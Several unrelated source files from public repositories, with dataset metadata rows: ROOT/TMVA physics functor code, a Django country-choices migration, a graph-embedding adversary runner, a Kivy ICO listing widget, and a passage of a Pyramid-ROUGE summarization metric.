#ROOT.gSystem.Load("libFinalStateAnalysisStatTools")
TMVA_tools = ROOT.TMVA.Tools.Instance()
class RooFunctorFromWS(ROOT.RooFunctor):
def __init__(self, workspace, functionname, var='x'):
# Get the RooFormulaVar
self.function = workspace.function(functionname)
# Get the ind. var and the parameters
#self.x = workspace.var(var)
self.x = self.function.getParameter(var) if hasattr(self.function, 'getParameter') else self.function.getVariables().find(var)
self.x.setRange(0, 1e99)
def __call__(self, x):
self.x.setVal(x)
return self.function.getVal()
class FunctorFromTF1(object):
def __init__(self, tfile_name, path):
# Get the RooFormulaVar
self.tfile = ROOT.TFile.Open(tfile_name)
self.function = self.tfile.Get(path)
def __call__(self, x):
return self.function.Eval(x)
class MultiFunctorFromTF1(object):
def __init__(self, tfile_name, paths_and_borders):
# Get the RooFormulaVar
self.tfile = ROOT.TFile.Open(tfile_name)
self.fcns_and_borders = []
for path, borders in paths_and_borders:
self.fcns_and_borders.append(
(self.tfile.Get(path),
borders)
)
def __call__(self, x, y):
for fcn, border in self.fcns_and_borders:
if border[0] <= y < border[1]:
return fcn.Eval(x)
raise ValueError("MultiFunctorFromTF1: y range aoutside boundaries!")
class FunctorFromMVA(object):
def __init__(self, name, xml_filename, *variables, **kwargs):
self.reader = ROOT.TMVA.Reader( "!Color:Silent=%s:Verbose=%s" % (kwargs.get('silent','T'), kwargs.get('verbose','F')))
self.var_map = {}
self.name = name
self.variables = variables
self.xml_filename = xml_filename
for var in variables:
self.var_map[var] = array.array('f',[0])
self.reader.AddVariable(var, self.var_map[var])
self.reader.BookMVA(name, xml_filename)
def evaluate_(self): #so I can profile the time needed
return self.reader.EvaluateMVA(self.name)
@memo_last
def __call__(self, **kvars):
#kvars enforces that we use the proper vars
if not (
all(name in self.variables for name in kvars.keys()) and \
all(name in kvars.keys() for name in self.variables)
):
raise Exception("Wrong variable names. Available variables: %s" % self.variables.__repr__())
for name, val in kvars.iteritems():
self.var_map[name][0] = val
retval = self.evaluate_() #reader.EvaluateMVA(self.name)
#if retval == 1:
# print "returning 1 in %s, kvars: %s" % (self.xml_filename, kvars.items())
return retval
class MultiFunctorFromMVA(object):
'''Phil's diboson subtraction implementation'''
def __init__(self, name, data_and_lumi, mcs_and_lumis, *variables, **kwargs):
phase_space = kwargs.get('phase_space','')
print 'phase_space: %s' % phase_space
self.functors_and_weights = []
data_xml, data_lumi = data_and_lumi
self.functors_and_weights.append(
(FunctorFromMVA('_'.join([name, data_xml]), data_xml, *variables, **kwargs),
1.)
)
#compute data phase space
training_path = kwargs.get('training_ntuple','training_ntuple')
tfile = ROOT.TFile.Open(data_xml.replace('weights.xml','root'))
training = tfile.Get(training_path)
data_phase_space = training.GetEntries(phase_space)
tfile.Close()
for xml, lumi in mcs_and_lumis:
weight = data_lumi / lumi
tfile = ROOT.TFile.Open(xml.replace('weights.xml','root'))
training = tfile.Get(training_path)
mc_phase_space = training.GetEntries(phase_space)
tfile.Close()
weight *= float(mc_phase_space) / float(data_phase_space)
weight *= -1
self.functors_and_weights.append(
(FunctorFromMVA('_'.join([name, xml]), xml, *variables, **kwargs),
weight)
)
@memo_last
def __call__(self, **kvars):
return sum(
weight*functor(**kvars) for functor, weight in self.functors_and_weights
)
def build_roofunctor(filename, wsname, functionname, var='x'):
''' Build a functor from a filename '''
file = ROOT.TFile.Open(filename)
if not file:
raise IOError("Can't open file: %s" % filename)
ws = file.Get(wsname)
return RooFunctorFromWS(ws, functionname, var)
def make_corrector_from_th2(filename, path):
tfile = ROOT.TFile.Open(filename)
if not tfile:
raise IOError("Can't open file: %s" % filename)
hist = tfile.Get(path).Clone()
#print hist
binsx = hist.GetNbinsX()
binsy = hist.GetNbinsY()
def refFun(xval,yval):
#print hist
xbin = hist.GetXaxis().FindFixBin(xval) #Faster than FindBin
xbin = (xbin if xbin <= binsx else binsx ) if xbin >= 1 else 1 #Compute underflow and overflow as first and last bin
ybin = hist.GetYaxis().FindFixBin(yval)
ybin = (ybin if ybin <= binsy else binsy ) if ybin >= 1 else 1 #Compute underflow and overflow as first and last bin
prob = hist.GetBinContent(xbin,ybin)
if prob:
return prob
else:
return 10**-8
# raise ZeroDivisionError(" catched trying to return weight for (%.3f,%.3f) ==> (%i,%i) bin out of (%i,%i). Prob: %.3f. Hist: %s : %s. " % (xval, yval, xbin, ybin, binsx, binsy , prob, filename, path))
return refFun
def make_corrector_from_histo(filename, path, dimensions='2D'):
is2d = (dimensions.lower() == '2d')
tfile = ROOT.TFile.Open(filename)
if not tfile:
raise IOError("Can't open file: %s" % filename)
hist = tfile.Get(path).Clone()
#print hist
binsx = hist.GetNbinsX()
binsy = hist.GetNbinsY() if is2d else None
def refFun(xval,yval=None):
#print hist
#FindFixBin is faster than FindBin
#Compute underflow and overflow as first and last bin
xbin = max( min(hist.GetXaxis().FindFixBin(xval), binsx), 1)
ybin = None
if is2d:
xbin = max( min(hist.GetYaxis().FindFixBin(yval), binsy), 1)
prob = hist.GetBinContent(xbin,ybin) if is2d else hist.GetBinContent(xbin)
if prob:
return prob
else:
return 10**-8
# raise ZeroDivisionError(" catched trying to return weight for (%.3f,%.3f) ==> (%i,%i) bin out of (%i,%i). Prob: %.3f. Hist: %s : %s. " % (xval, yval, xbin, ybin, binsx, binsy , prob, filename, path))
return refFun
#backward compatibility
make_corrector_from_th2 = make_corrector_from_histo
def build_uncorr_2Droofunctor(functor_x, functor_y, filename, num='numerator', den='denominator'):
''' Build a functor from a filename '''
file = ROOT.TFile.Open(filename)
num_int = file.Get(num).Integral()
den_int = file.Get(den).Integral()
scale = num_int/den_int
def _f(x, y):
print scale
return functor_x(x)*functor_y(y)/scale
return _f
if __name__ == "__main__":
import doctest; doctest.testmod()
| [
"Silvia.Taroni@cern.ch"
] | Silvia.Taroni@cern.ch |
6f821c9d5633f1d86773ad0b9df3158f4d007975 | a99372d1c71be907e1fbfb4f7287363ff1f51f56 | /accounts/migrations/0002_auto_20190125_0913.py | ad9b20ba3f75f20c8f1d15c91ef73f31aca5bc2a | [
"MIT"
] | permissive | domambia/csdigital-gs1kenya-internal-erp | 43045c219b627453f30da9c6bd62335985f81927 | be36378ad7b960d074dd5841aaadc849ac6356de | refs/heads/master | 2022-12-10T13:49:55.516938 | 2021-10-31T15:08:29 | 2021-10-31T15:08:29 | 164,619,152 | 17 | 14 | null | 2022-12-08T01:44:41 | 2019-01-08T09:59:34 | Python | UTF-8 | Python | false | false | 8,523 | py | # Generated by Django 2.1.5 on 2019-01-25 09:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='employee',
name='county',
field=models.CharField(blank=True, choices=[('Aruba', 'Aruba'), ('Afghanistan', 'Afghanistan'), ('Angola', 'Angola'), ('Anguilla', 'Anguilla'), ('Åland Islands', 'Åland Islands'), ('Albania', 'Albania'), ('Andorra', 'Andorra'), ('United Arab Emirates', 'United Arab Emirates'), ('Argentina', 'Argentina'), ('Armenia', 'Armenia'), ('American Samoa', 'American Samoa'), ('Antarctica', 'Antarctica'), ('French Southern Territories', 'French Southern Territories'), ('Antigua and Barbuda', 'Antigua and Barbuda'), ('Australia', 'Australia'), ('Austria', 'Austria'), ('Azerbaijan', 'Azerbaijan'), ('Burundi', 'Burundi'), ('Belgium', 'Belgium'), ('Benin', 'Benin'), ('Bonaire, Sint Eustatius and Saba', 'Bonaire, Sint Eustatius and Saba'), ('Burkina Faso', 'Burkina Faso'), ('Bangladesh', 'Bangladesh'), ('Bulgaria', 'Bulgaria'), ('Bahrain', 'Bahrain'), ('Bahamas', 'Bahamas'), ('Bosnia and Herzegovina', 'Bosnia and Herzegovina'), ('Saint Barthélemy', 'Saint Barthélemy'), ('Belarus', 'Belarus'), ('Belize', 'Belize'), ('Bermuda', 'Bermuda'), ('Bolivia, Plurinational State of', 'Bolivia, Plurinational State of'), ('Brazil', 'Brazil'), ('Barbados', 'Barbados'), ('Brunei Darussalam', 'Brunei Darussalam'), ('Bhutan', 'Bhutan'), ('Bouvet Island', 'Bouvet Island'), ('Botswana', 'Botswana'), ('Central African Republic', 'Central African Republic'), ('Canada', 'Canada'), ('Cocos (Keeling) Islands', 'Cocos (Keeling) Islands'), ('Switzerland', 'Switzerland'), ('Chile', 'Chile'), ('China', 'China'), ("Côte d'Ivoire", "Côte d'Ivoire"), ('Cameroon', 'Cameroon'), ('Congo, The Democratic Republic of the', 'Congo, The Democratic Republic of the'), ('Congo', 'Congo'), ('Cook Islands', 'Cook Islands'), ('Colombia', 'Colombia'), ('Comoros', 'Comoros'), ('Cabo Verde', 'Cabo Verde'), ('Costa Rica', 'Costa Rica'), ('Cuba', 'Cuba'), ('Curaçao', 'Curaçao'), ('Christmas Island', 'Christmas Island'), ('Cayman Islands', 'Cayman Islands'), ('Cyprus', 'Cyprus'), ('Czechia', 'Czechia'), ('Germany', 'Germany'), ('Djibouti', 'Djibouti'), ('Dominica', 'Dominica'), ('Denmark', 'Denmark'), ('Dominican Republic', 'Dominican Republic'), ('Algeria', 'Algeria'), ('Ecuador', 'Ecuador'), ('Egypt', 'Egypt'), ('Eritrea', 'Eritrea'), ('Western Sahara', 'Western Sahara'), ('Spain', 'Spain'), ('Estonia', 'Estonia'), ('Ethiopia', 'Ethiopia'), ('Finland', 'Finland'), ('Fiji', 'Fiji'), ('Falkland Islands (Malvinas)', 'Falkland Islands (Malvinas)'), ('France', 'France'), ('Faroe Islands', 'Faroe Islands'), ('Micronesia, Federated States of', 'Micronesia, Federated States of'), ('Gabon', 'Gabon'), ('United Kingdom', 'United Kingdom'), ('Georgia', 'Georgia'), ('Guernsey', 'Guernsey'), ('Ghana', 'Ghana'), ('Gibraltar', 'Gibraltar'), ('Guinea', 'Guinea'), ('Guadeloupe', 'Guadeloupe'), ('Gambia', 'Gambia'), ('Guinea-Bissau', 'Guinea-Bissau'), ('Equatorial Guinea', 'Equatorial Guinea'), ('Greece', 'Greece'), ('Grenada', 'Grenada'), ('Greenland', 'Greenland'), ('Guatemala', 'Guatemala'), ('French Guiana', 'French Guiana'), ('Guam', 'Guam'), ('Guyana', 'Guyana'), ('Hong Kong', 'Hong Kong'), ('Heard Island and McDonald Islands', 'Heard Island and McDonald Islands'), ('Honduras', 'Honduras'), ('Croatia', 'Croatia'), ('Haiti', 'Haiti'), ('Hungary', 'Hungary'), ('Indonesia', 'Indonesia'), ('Isle of Man', 'Isle of Man'), ('India', 'India'), ('British Indian Ocean Territory', 'British Indian Ocean Territory'), ('Ireland', 'Ireland'), ('Iran, Islamic Republic of', 'Iran, Islamic Republic of'), ('Iraq', 'Iraq'), ('Iceland', 'Iceland'), ('Israel', 'Israel'), ('Italy', 'Italy'), ('Jamaica', 'Jamaica'), ('Jersey', 'Jersey'), ('Jordan', 'Jordan'), ('Japan', 'Japan'), ('Kazakhstan', 'Kazakhstan'), ('Kenya', 'Kenya'), ('Kyrgyzstan', 'Kyrgyzstan'), ('Cambodia', 'Cambodia'), ('Kiribati', 'Kiribati'), ('Saint Kitts and Nevis', 'Saint Kitts and Nevis'), ('Korea, Republic of', 'Korea, Republic of'), ('Kuwait', 'Kuwait'), ("Lao People's Democratic Republic", "Lao People's Democratic Republic"), ('Lebanon', 'Lebanon'), ('Liberia', 'Liberia'), ('Libya', 'Libya'), ('Saint Lucia', 'Saint Lucia'), ('Liechtenstein', 'Liechtenstein'), ('Sri Lanka', 'Sri Lanka'), ('Lesotho', 'Lesotho'), ('Lithuania', 'Lithuania'), ('Luxembourg', 'Luxembourg'), ('Latvia', 'Latvia'), ('Macao', 'Macao'), ('Saint Martin (French part)', 'Saint Martin (French part)'), ('Morocco', 'Morocco'), ('Monaco', 'Monaco'), ('Moldova, Republic of', 'Moldova, Republic of'), ('Madagascar', 'Madagascar'), ('Maldives', 'Maldives'), ('Mexico', 'Mexico'), ('Marshall Islands', 'Marshall Islands'), ('Macedonia, Republic of', 'Macedonia, Republic of'), ('Mali', 'Mali'), ('Malta', 'Malta'), ('Myanmar', 'Myanmar'), ('Montenegro', 'Montenegro'), ('Mongolia', 'Mongolia'), ('Northern Mariana Islands', 'Northern Mariana Islands'), ('Mozambique', 'Mozambique'), ('Mauritania', 'Mauritania'), ('Montserrat', 'Montserrat'), ('Martinique', 'Martinique'), ('Mauritius', 'Mauritius'), ('Malawi', 'Malawi'), ('Malaysia', 'Malaysia'), ('Mayotte', 'Mayotte'), ('Namibia', 'Namibia'), ('New Caledonia', 'New Caledonia'), ('Niger', 'Niger'), ('Norfolk Island', 'Norfolk Island'), ('Nigeria', 'Nigeria'), ('Nicaragua', 'Nicaragua'), ('Niue', 'Niue'), ('Netherlands', 'Netherlands'), ('Norway', 'Norway'), ('Nepal', 'Nepal'), ('Nauru', 'Nauru'), ('New Zealand', 'New Zealand'), ('Oman', 'Oman'), ('Pakistan', 'Pakistan'), ('Panama', 'Panama'), ('Pitcairn', 'Pitcairn'), ('Peru', 'Peru'), ('Philippines', 'Philippines'), ('Palau', 'Palau'), ('Papua New Guinea', 'Papua New Guinea'), ('Poland', 'Poland'), ('Puerto Rico', 'Puerto Rico'), ("Korea, Democratic People's Republic of", "Korea, Democratic People's Republic of"), ('Portugal', 'Portugal'), ('Paraguay', 'Paraguay'), ('Palestine, State of', 'Palestine, State of'), ('French Polynesia', 'French Polynesia'), ('Qatar', 'Qatar'), ('Réunion', 'Réunion'), ('Romania', 'Romania'), ('Russian Federation', 'Russian Federation'), ('Rwanda', 'Rwanda'), ('Saudi Arabia', 'Saudi Arabia'), ('Sudan', 'Sudan'), ('Senegal', 'Senegal'), ('Singapore', 'Singapore'), ('South Georgia and the South Sandwich Islands', 'South Georgia and the South Sandwich Islands'), ('Saint Helena, Ascension and Tristan da Cunha', 'Saint Helena, Ascension and Tristan da Cunha'), ('Svalbard and Jan Mayen', 'Svalbard and Jan Mayen'), ('Solomon Islands', 'Solomon Islands'), ('Sierra Leone', 'Sierra Leone'), ('El Salvador', 'El Salvador'), ('San Marino', 'San Marino'), ('Somalia', 'Somalia'), ('Saint Pierre and Miquelon', 'Saint Pierre and Miquelon'), ('Serbia', 'Serbia'), ('South Sudan', 'South Sudan'), ('Sao Tome and Principe', 'Sao Tome and Principe'), ('Suriname', 'Suriname'), ('Slovakia', 'Slovakia'), ('Slovenia', 'Slovenia'), ('Sweden', 'Sweden'), ('Swaziland', 'Swaziland'), ('Sint Maarten (Dutch part)', 'Sint Maarten (Dutch part)'), ('Seychelles', 'Seychelles'), ('Syrian Arab Republic', 'Syrian Arab Republic'), ('Turks and Caicos Islands', 'Turks and Caicos Islands'), ('Chad', 'Chad'), ('Togo', 'Togo'), ('Thailand', 'Thailand'), ('Tajikistan', 'Tajikistan'), ('Tokelau', 'Tokelau'), ('Turkmenistan', 'Turkmenistan'), ('Timor-Leste', 'Timor-Leste'), ('Tonga', 'Tonga'), ('Trinidad and Tobago', 'Trinidad and Tobago'), ('Tunisia', 'Tunisia'), ('Turkey', 'Turkey'), ('Tuvalu', 'Tuvalu'), ('Taiwan, Province of China', 'Taiwan, Province of China'), ('Tanzania, United Republic of', 'Tanzania, United Republic of'), ('Uganda', 'Uganda'), ('Ukraine', 'Ukraine'), ('United States Minor Outlying Islands', 'United States Minor Outlying Islands'), ('Uruguay', 'Uruguay'), ('United States', 'United States'), ('Uzbekistan', 'Uzbekistan'), ('Holy See (Vatican City State)', 'Holy See (Vatican City State)'), ('Saint Vincent and the Grenadines', 'Saint Vincent and the Grenadines'), ('Venezuela, Bolivarian Republic of', 'Venezuela, Bolivarian Republic of'), ('Virgin Islands, British', 'Virgin Islands, British'), ('Virgin Islands, U.S.', 'Virgin Islands, U.S.'), ('Viet Nam', 'Viet Nam'), ('Vanuatu', 'Vanuatu'), ('Wallis and Futuna', 'Wallis and Futuna'), ('Samoa', 'Samoa'), ('Yemen', 'Yemen'), ('South Africa', 'South Africa'), ('Zambia', 'Zambia'), ('Zimbabwe', 'Zimbabwe')], default='No country', max_length=100),
),
]
| [
"omambiadauglous@gmail.com"
] | omambiadauglous@gmail.com |
f3bfb9ab8e84fa184357abde57024da707ea358c | 9e371869045a2f091f633e9335ab091b368f254c | /src/n_hop.py | 0d97d1f5f79216f73ebf2f9686a240b122f69977 | [
"MIT"
] | permissive | liaopeiyuan/information-obfuscation-demo | e10e0bedf49a4e92d387b1c72855455a6a6fb34b | 018cb6a2cce5033bf836d78aa8824204ec5553f7 | refs/heads/main | 2023-07-14T12:06:59.544186 | 2021-08-13T11:06:14 | 2021-08-13T11:06:14 | 395,622,445 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,181 | py | # -*- coding: utf-8 -*-
from models import (GAL_Nhop, NeighborClassifier, NodeClassifier,
SharedBilinearDecoder)
from node_attack import NodeAttackRunner
class NHopAttackRunner(NodeAttackRunner):
def __init__(self, args):
super().__init__(args)
def get_base_model(self):
decoder = SharedBilinearDecoder(
self.args.num_rel, 2, self.args.embed_dim, self.args
).to(self.args.device)
model = GAL_Nhop(
decoder, self.args.embed_dim, self.args.num_ent, self.edges, self.args
).to(self.args.device)
return model
def num_adversaries(self):
return 2
def get_ordered_adversary_names(self):
return ["Node", "Neighbor"]
def get_adversary_models(self, mode):
embeddings = self.base_model.encode(None).detach().squeeze(0)
return [
NodeClassifier(self.args.embed_dim, embeddings).to(self.args.device),
NeighborClassifier(self.args.embed_dim, embeddings, self.edges).to(
self.args.device
),
]
if __name__ == "__main__":
assert False # You shouldn't run this. Please call exec.py
| [
"alexander_liao@outlook.com"
] | alexander_liao@outlook.com |
14bc832d47b3da2154b8587a674dcb20b9082d4a | 02c30e3e2c0f701d77f0a23591027ae62f37a512 | /libs/uix/baseclasses/ico_dir/icobazaar.py | d1952e1f8fc355ded5e1550906d1a7a946896863 | [
"MIT"
] | permissive | mkbeh/CRyptoLab | 5341a48a403ecf23e10248c46e919c1381275551 | 424c938c16c9264e99eff71e4c1a27ca65314d42 | refs/heads/master | 2022-12-22T06:39:36.909313 | 2018-09-25T14:40:32 | 2018-09-25T14:40:32 | 144,743,677 | 0 | 2 | MIT | 2022-12-08T02:22:14 | 2018-08-14T16:09:19 | Python | UTF-8 | Python | false | false | 4,537 | py | # -*- coding: utf-8 -*-
from kivy.lang.builder import Builder
from kivy.properties import ObjectProperty
from kivy.cache import Cache
from kivy.uix.boxlayout import BoxLayout
from libs.customwidgets.ico.cardicobazaar import CardIcoBazaar
from libs.customwidgets.popupcm import PopupCM, PopupCMContent
from libs.utils import utils
Builder.load_string('''
<Icobazaar>:
cats_box: cats_box
upcoming: upcoming
categories: categories
grid_box: grid_box
orientation: 'vertical'
size_hint_y: None
height: self.minimum_height
GridLayout:
id: cats_box
size_hint_y: None
cols: 3
rows: 2
NavigationDrawerIconButton:
text: "Upcoming"
badge_text: '12'
id: upcoming
name: 'upcoming'
on_release: root.on_event(upcoming)
NavigationDrawerIconButton:
text: "Ongoing"
badge_text: '12'
id: ongoing
name: 'ongoing'
on_release: root.on_event(ongoing)
NavigationDrawerIconButton:
text: "Ended"
badge_text: '12'
id: ended
name: 'ended'
on_release: root.on_event(ended)
NavigationDrawerIconButton:
text: "New"
badge_text: '12'
id: new
name: 'new'
on_release: root.on_event(new)
NavigationDrawerIconButton:
text: "All"
badge_text: '12'
id: all
name: 'all'
on_release: root.on_event(all)
NavigationDrawerIconButton:
id: categories
name: 'categories'
text: "Open Categories"
icon: 'menu-down'
on_release:
root.open_categories_popup();
root.on_event(categories)
GridLayout:
id: grid_box
cols: 1
spacing: dp(20)
pos_hint: {'center_x':.5}
size_hint: (.95, None)
''')
class Icobazaar(BoxLayout):
cats_box = ObjectProperty(None)
grid_box = ObjectProperty(None)
categories = ObjectProperty()
upcoming = ObjectProperty()
last_category_btn = None # Last menu button , which was pressed.
def __init__(self, **kwargs):
super(Icobazaar, self).__init__(**kwargs)
self.popup = PopupCM(title='Категории', content=PopupCMContent())
self.gen_cards()
def open_categories_popup(self):
"""
Method which open popup which contains ico list of categories.
:return:
"""
self.popup.open()
def on_event(self, obj):
"""
Event method which fired when clicked on category button.
This method change set active color to button and remove active color from last pressed.
:param obj:
:return:
"""
if obj.name != 'categories':
self.upcoming._active = False
self.categories._active = False
try:
self.last_category_btn._active = False
except AttributeError:
pass
obj._active = True
self.last_category_btn = obj
# Remove active state for all items in categories popup.
cat_items_lst = self.popup.children[0].children[0].children[0].children[0].children
for cat in cat_items_lst:
cat._active = False
self.gen_cards()
def gen_cards(self):
"""
Method which generate cards with ico projects description.
:return:
"""
# Check for active category button.
if self.last_category_btn is None:
self.upcoming._active = True
self.grid_box.bind(minimum_height=self.grid_box.setter('height'))
# Get active category.
cat = self.last_category_btn.text.lower() if self.last_category_btn is not None \
else self.upcoming.text.lower()
# Get url content.
url = 'http://127.0.0.1:8000/ico/icobazaar&cat={}&limit=150&skip=0'.format(cat)
icos_lst = utils.get_url_content(url)
# Clear widgets and generate cards.
self.grid_box.clear_widgets()
import gc
gc.collect()
for ico_data in icos_lst:
card = CardIcoBazaar(ico_data)
self.grid_box.add_widget(card)
# Set categories box object into cache.
Cache.register('menu_cats_box')
Cache.append('menu_cats_box', 'cats_box_obj', self.cats_box)
| [
"mkbehforever@gmail.com"
] | mkbehforever@gmail.com |
e5c03cf87ab1e87af4b7366b9c226547f5a60ddd | 4e229e075a3f5e71a33525981fa51fd7878c9715 | /sacrerouge/metrics/pyramid_rouge.py | 6f3230d33d14a5882664976a1c80b37674095cf1 | [] | no_license | CogComp/content-analysis-experiments | 57d68441272c39b687656976d20eddd817c28250 | f6abd72029b6853627ddd191979f105a9385eed7 | refs/heads/master | 2023-06-27T00:29:34.115264 | 2021-08-04T14:36:17 | 2021-08-04T14:36:17 | 305,768,372 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 16,210 | py | import os
import re
from collections import defaultdict
from nltk.stem import PorterStemmer
from typing import Dict, List, Set, Tuple
from sacrerouge.common import DATA_ROOT
from sacrerouge.data import MetricsDict, Pyramid, PyramidAnnotation
from sacrerouge.data.fields import PyramidField, PyramidAnnotationField
from sacrerouge.data.jackknifers import PyramidJackknifer
from sacrerouge.data.types import SummaryType
from sacrerouge.metrics import Metric
from sacrerouge.metrics.interpretable_rouge.util import calculate_maximum_matching
@Metric.register('pyramid-rouge')
class PyramidRouge(Metric):
_non_alphanumeric_regex = re.compile('[^A-Za-z0-9]')
def __init__(self,
use_porter_stemmer: bool = True,
remove_stopwords: bool = False,
rouge_data_dir: str = f'{DATA_ROOT}/metrics/ROUGE-1.5.5/data') -> None:
super().__init__(['pyramid'], jackknifer=PyramidJackknifer())
self.use_porter_stemmer = use_porter_stemmer
self.remove_stopwords = remove_stopwords
self.stemmer = PorterStemmer(PorterStemmer.ORIGINAL_ALGORITHM)
self.stemmer_exceptions = self._load_stemmer_exceptions(rouge_data_dir)
self.stopwords = self._load_stopwords(rouge_data_dir)
def _load_stemmer_exceptions(self, root: str) -> Dict[str, str]:
exceptions = {}
for filename in ['adj.exc', 'adv.exc', 'noun.exc', 'verb.exc']:
file_path = os.path.join(root, 'WordNet-2.0-Exceptions', filename)
with open(file_path, 'r') as f:
for line in f:
# I think there is a bug in the original perl script
# to construct the exceptions database. Some of the lines
# have more than 2 words on them, but the script only
# maps the first to the second, ignoring the third.
columns = line.strip().split()
exceptions[columns[0]] = columns[1]
return exceptions
def _load_stopwords(self, root: str) -> Set[str]:
file_path = os.path.join(root, 'smart_common_words.txt')
return set(open(file_path, 'r').read().splitlines())
def _get_summary_scu_to_offsets(self, annotation: PyramidAnnotation) -> Dict[int, List[Tuple[int, int]]]:
scu_to_offsets = defaultdict(list)
for scu in annotation.scus:
for contributor in scu.contributors:
for part in contributor.parts:
scu_to_offsets[scu.scu_id].append((part.start, part.end))
return scu_to_offsets
def _get_reference_scu_to_offsets(self, pyramid: Pyramid, index: int) -> Dict[int, List[Tuple[int, int]]]:
scu_to_offsets = defaultdict(list)
for scu in pyramid.scus:
for contributor in scu.contributors:
if contributor.summary_index == index:
for part in contributor.parts:
scu_to_offsets[scu.scu_id].append((part.start, part.end))
return scu_to_offsets
def _filter_scu_to_offsets(self,
scu_to_offsets: Dict[int, List[Tuple[int, int]]],
valid_scus: Set[int]) -> Dict[int, List[Tuple[int, int]]]:
return {scu: offsets for scu, offsets in scu_to_offsets.items() if scu in valid_scus}
def _get_scu_intersection(self, annotation: PyramidAnnotation, pyramid: Pyramid, index: int) -> Set[int]:
annotation_scus = annotation.get_scu_id_set()
reference_scus = pyramid.get_scu_id_set(index)
return annotation_scus & reference_scus
def _tokenize(self, summary: str, scu_to_offsets: Dict[int, List[Tuple[int, int]]]):
summary = summary.lower()
tokens = []
index_to_scus = []
for match in re.finditer(r'\S+', summary):
token = match.group(0)
offset = match.start()
assert summary[offset:offset + len(token)] == token, (summary, offset, token)
# Even though this token may decompose into smaller tokens
# (e.g. "it's" -> "it s"), we will still map it to the same offset
# as a simplifying assumption
for subtoken in PyramidRouge._non_alphanumeric_regex.sub(' ', token).split():
if self.remove_stopwords and subtoken in self.stopwords:
continue
if self.use_porter_stemmer and len(subtoken) > 3:
if subtoken in self.stemmer_exceptions:
subtoken = self.stemmer_exceptions[subtoken]
else:
subtoken = self.stemmer.stem(subtoken)
# Find all of the SCUs that overlap with this subtoken
scus = set()
for scu_id, offsets_list in scu_to_offsets.items():
for start, end in offsets_list:
if start <= offset and offset < end:
scus.add(scu_id)
break
tokens.append(subtoken)
index_to_scus.append(scus)
return tokens, index_to_scus
def _compute_standard_rouge(self,
summary_tokens: List[str],
summary_index_to_scus: List[Set[int]],
reference_tokens: List[str],
reference_index_to_scus: List[Set[int]]) -> MetricsDict():
# This is the standard ROUGE calculation except the SCU-based matches are
# given priority over non-SCU matches to maximize the percentage of the
# ROUGE score the SCU matches contribute.
summary_scu_to_indices = self._get_scu_to_indices(summary_index_to_scus)
reference_scu_to_indices = self._get_scu_to_indices(reference_index_to_scus)
all_matches = []
for scu in summary_scu_to_indices.keys():
summary_indices = summary_scu_to_indices[scu]
reference_indices = reference_scu_to_indices[scu]
matches = self._get_matches(summary_tokens, summary_indices,
reference_tokens, reference_indices)
all_matches.extend(matches)
num_scu_matches, matching = calculate_maximum_matching(all_matches, return_matching=True)
# Mark which tokens were matched and therefore no long eligible
summary_matches = [False] * len(summary_tokens)
references_matches = [False] * len(reference_tokens)
for i, j in matching:
summary_matches[i] = True
references_matches[j] = True
summary_indices = [i for i in range(len(summary_tokens)) if not summary_matches[i]]
reference_indices = [i for i in range(len(reference_tokens)) if not references_matches[i]]
matches = self._get_matches(summary_tokens, summary_indices,
reference_tokens, reference_indices)
num_non_scu_matches = calculate_maximum_matching(matches)
intersection = num_scu_matches + num_non_scu_matches
m = MetricsDict({
'intersection': intersection,
'num_summary_tokens': len(summary_tokens),
'num_reference_tokens': len(reference_tokens),
'num_scu_matches': num_scu_matches,
'num_non_scu_matches': num_non_scu_matches,
})
return m
def _get_scu_to_indices(self, index_to_scus: List[Set[int]]) -> Dict[int, List[int]]:
scu_to_indices = defaultdict(list)
for i, scus in enumerate(index_to_scus):
for scu in scus:
scu_to_indices[scu].append(i)
return scu_to_indices
def _get_matches(self,
summary_tokens: List[str],
summary_indices: List[int],
reference_tokens: List[str],
reference_indices: List[int]) -> List[Tuple[int, int]]:
matches = []
for i in summary_indices:
for j in reference_indices:
if summary_tokens[i] == reference_tokens[j]:
matches.append((i, j, 1.0))
return matches
def _count_tokens_with_scus(self, index_to_scus: List[Set[int]]) -> int:
return sum([1 for scus in index_to_scus if len(scus) > 0])
def _compute_scu_rouge(self,
summary_tokens: List[str],
summary_index_to_scus: List[Set[int]],
reference_tokens: List[str],
reference_index_to_scus: List[Set[int]]) -> MetricsDict:
summary_scu_to_indices = self._get_scu_to_indices(summary_index_to_scus)
reference_scu_to_indices = self._get_scu_to_indices(reference_index_to_scus)
all_matches = []
for scu in summary_scu_to_indices.keys():
summary_indices = summary_scu_to_indices[scu]
reference_indices = reference_scu_to_indices[scu]
matches = self._get_matches(summary_tokens, summary_indices,
reference_tokens, reference_indices)
all_matches.extend(matches)
intersection = calculate_maximum_matching(all_matches)
return MetricsDict({
'intersection': intersection,
'num_summary_tokens': self._count_tokens_with_scus(summary_index_to_scus),
'num_reference_tokens': self._count_tokens_with_scus(reference_index_to_scus)
})
def _get_indices_complement(self, num_tokens: int, indices: List[int]) -> List[int]:
indices = set(indices)
complement = []
for i in range(num_tokens):
if i not in indices:
complement.append(i)
return complement
def _get_non_scu_indices(self, index_to_scus: List[Set[int]]) -> List[int]:
indices = []
for i, scus in enumerate(index_to_scus):
if len(scus) == 0:
indices.append(i)
return indices
def _compute_non_scu_rouge(self,
summary_tokens: List[str],
summary_index_to_scus: List[Set[int]],
reference_tokens: List[str],
reference_index_to_scus: List[Set[int]]) -> MetricsDict:
summary_scu_to_indices = self._get_scu_to_indices(summary_index_to_scus)
reference_scu_to_indices = self._get_scu_to_indices(reference_index_to_scus)
all_matches = []
# For each SCU, we have to match the summary SCU tokens to any
# reference token NOT in that SCU and vice versa.
for scu in summary_scu_to_indices:
summary_indices = summary_scu_to_indices[scu]
reference_indices = reference_scu_to_indices[scu]
summary_complement = self._get_indices_complement(len(summary_tokens), summary_indices)
reference_complement = self._get_indices_complement(len(reference_tokens), reference_indices)
matches = self._get_matches(summary_tokens, summary_indices,
reference_tokens, reference_complement)
all_matches.extend(matches)
matches = self._get_matches(summary_tokens, summary_complement,
reference_tokens, reference_indices)
all_matches.extend(matches)
# Then we have to match any token not part of any SCU in the summary
# to any token not part of any SCU in the reference.
summary_indices = self._get_non_scu_indices(summary_index_to_scus)
reference_indices = self._get_non_scu_indices(reference_index_to_scus)
matches = self._get_matches(summary_tokens, summary_indices,
reference_tokens, reference_indices)
all_matches.extend(matches)
